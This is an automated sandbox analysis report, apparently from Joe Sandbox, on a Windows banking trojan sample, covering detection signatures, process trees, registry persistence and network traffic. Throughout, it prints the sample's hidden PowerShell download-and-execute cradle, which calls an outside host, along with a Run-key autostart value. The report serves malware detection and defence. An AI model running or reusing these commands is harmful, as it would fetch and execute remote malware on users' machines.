Windows Analysis Report
87J30ulb4q.exe

Overview

General Information

Sample name: 87J30ulb4q.exe (renamed because the original name is a hash value)
Original sample name: 7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867.exe
Analysis ID: 1588179
MD5: f60ca825aa99f293f45fd16610d64a45
SHA1: 2661b9d7a7801b1aa997ff3fc7c9d30aedbc4fa6
SHA256: 7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867
Tags: netbanker, exe, latam, trojan, user-johnk3r

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Decrypt And Execute Base64 Data
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 87J30ulb4q.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\87J30ulb4q.exe" MD5: F60CA825AA99F293F45FD16610D64A45)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 7452 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7684 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7224, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x1885:$b2: ::FromBase64String(
  • 0x1962:$b2: ::FromBase64String(
  • 0x1d0fa:$b2: ::FromBase64String(
  • 0x72267:$b2: ::FromBase64String(
  • 0x766d7:$b2: ::FromBase64String(
  • 0x9b7a2:$b2: ::FromBase64String(
  • 0x13063d:$b2: ::FromBase64String(
  • 0x1484c8:$b2: ::FromBase64String(
  • 0x175d01:$b2: ::FromBase64String(
  • 0x175dde:$b2: ::FromBase64String(
  • 0x18f93a:$b2: ::FromBase64String(
  • 0x18fc5e:$b2: ::FromBase64String(
  • 0x18ff97:$b2: ::FromBase64String(
  • 0x190253:$b2: ::FromBase64String(
  • 0x190797:$b2: ::FromBase64String(
  • 0x190ffa:$b2: ::FromBase64String(
  • 0x1910e2:$b2: ::FromBase64String(
  • 0x1d6d86:$b2: ::FromBase64String(
  • 0x1d6e63:$b2: ::FromBase64String(
  • 0x1d6f40:$b2: ::FromBase64String(
  • 0x2055a9:$b2: ::FromBase64String(
Source: Process Memory Space: powershell.exe PID: 7452, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x7abb9:$b2: ::FromBase64String(
  • 0x7acc5:$b2: ::FromBase64String(
  • 0xa80c0:$b2: ::FromBase64String(
  • 0xabb16:$b2: ::FromBase64String(
  • 0x1447a4:$b2: ::FromBase64String(
  • 0x15c022:$b2: ::FromBase64String(
  • 0x15c281:$b2: ::FromBase64String(
  • 0x15c399:$b2: ::FromBase64String(
  • 0x1850c8:$b2: ::FromBase64String(
  • 0x1851d4:$b2: ::FromBase64String(
  • 0x1852fc:$b2: ::FromBase64String(
  • 0x18540a:$b2: ::FromBase64String(
  • 0x185d9f:$b2: ::FromBase64String(
  • 0x1863cd:$b2: ::FromBase64String(
  • 0x1b21d4:$b2: ::FromBase64String(
  • 0x1eb5be:$b2: ::FromBase64String(
  • 0x1eb6d1:$b2: ::FromBase64String(
  • 0x1eb9df:$b2: ::FromBase64String(
  • 0x1ebcad:$b2: ::FromBase64String(
  • 0x21a4f9:$b2: ::FromBase64String(
  • 0x222a4e:$b2: ::FromBase64String(
Source: Process Memory Space: powershell.exe PID: 7684, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x22965:$b2: ::FromBase64String(
  • 0x22bf6:$b2: ::FromBase64String(
  • 0x26a2a:$b2: ::FromBase64String(
  • 0x26b36:$b2: ::FromBase64String(
  • 0x27533:$b2: ::FromBase64String(
  • 0x283ed:$b2: ::FromBase64String(
  • 0x41e9c:$b2: ::FromBase64String(
  • 0x41fa8:$b2: ::FromBase64String(
  • 0x80d6a:$b2: ::FromBase64String(
  • 0xa57f9:$b2: ::FromBase64String(
  • 0xa590c:$b2: ::FromBase64String(
  • 0xa5c1a:$b2: ::FromBase64String(
  • 0xa5ee8:$b2: ::FromBase64String(
  • 0x18a255:$b2: ::FromBase64String(
  • 0x1b9217:$b2: ::FromBase64String(
  • 0x1c11ba:$b2: ::FromBase64String(
  • 0x22fac2:$b2: ::FromBase64String(
  • 0x22fbce:$b2: ::FromBase64String(
  • 0x2294b:$b3: ::UTF8.GetString(
  • 0x22bdc:$b3: ::UTF8.GetString(
  • 0x26a10:$b3: ::UTF8.GetString(

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\87J30ulb4q.exe, ProcessId: 5708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jbgfag
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems), Data: Details: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\87J30ulb4q.exe, ProcessId: 5708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jbgfag
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87J30ulb4q.exe", ParentImage: C:\Users\user\Desktop\87J30ulb4q.exe, ParentProcessId: 5708, ParentProcessName: 87J30ulb4q.exe, ProcessCommandLine: powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)", ProcessId: 7224, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: 87J30ulb4q.exe, ReversingLabs: Detection: 52%
Source: 87J30ulb4q.exe, Virustotal: Detection: 63%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.4% probability
Source: 87J30ulb4q.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49740 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49788 version: TLS 1.2
Source: 87J30ulb4q.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1558187413.00000238D0609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000008.00000002.1307175641.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1455748660.000001B76AD24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdby source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdb source: 87J30ulb4q.exe
Source: Binary string: utomation.pdbA source: powershell.exe, 0000000C.00000002.1555560960.00000238D03A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb[ source: powershell.exe, 0000000C.00000002.1555560960.00000238D03E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb! source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/^ source: powershell.exe, 0000000C.00000002.1557064368.00000238D0452000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\ source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb: source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbW source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdbbn|n nn_CorExeMainmscoree.dll source: 87J30ulb4q.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: global traffic, HTTP traffic detected: GET /gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM HTTP/1.1, Host: zjhy.coimbratratadores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jkqjcpxpnhtgxr HTTP/1.1, Host: zjhy.coimbratratadores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /ukbhsxzcjwqypk HTTP/1.1, Host: zjhy.coimbratratadores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /ukbhsxzcjwqypk HTTP/1.1, Host: zjhy.coimbratratadores.com, Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 104.21.96.1
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: zjhy.coimbratratadores.com
Source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.1476730296.00000238B6455000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000008.00000002.1312185487.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B7544A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1440209971.000001B762AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C840F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoft.c
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B754116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B9A62000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://zjhy.coimbratratadores.com
Source: 87J30ulb4q.exe, 00000000.00000002.1337853734.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://zjhy.coimbratratadores.comd
Source: powershell.exe, 00000009.00000002.1399731267.000001B752A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B83A1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1308266474.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1548093058.00000238C8552000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.1481177567.00000238B85CD000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1308266474.0000000004D9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1399731267.000001B753BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1481177567.00000238B8FCD000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
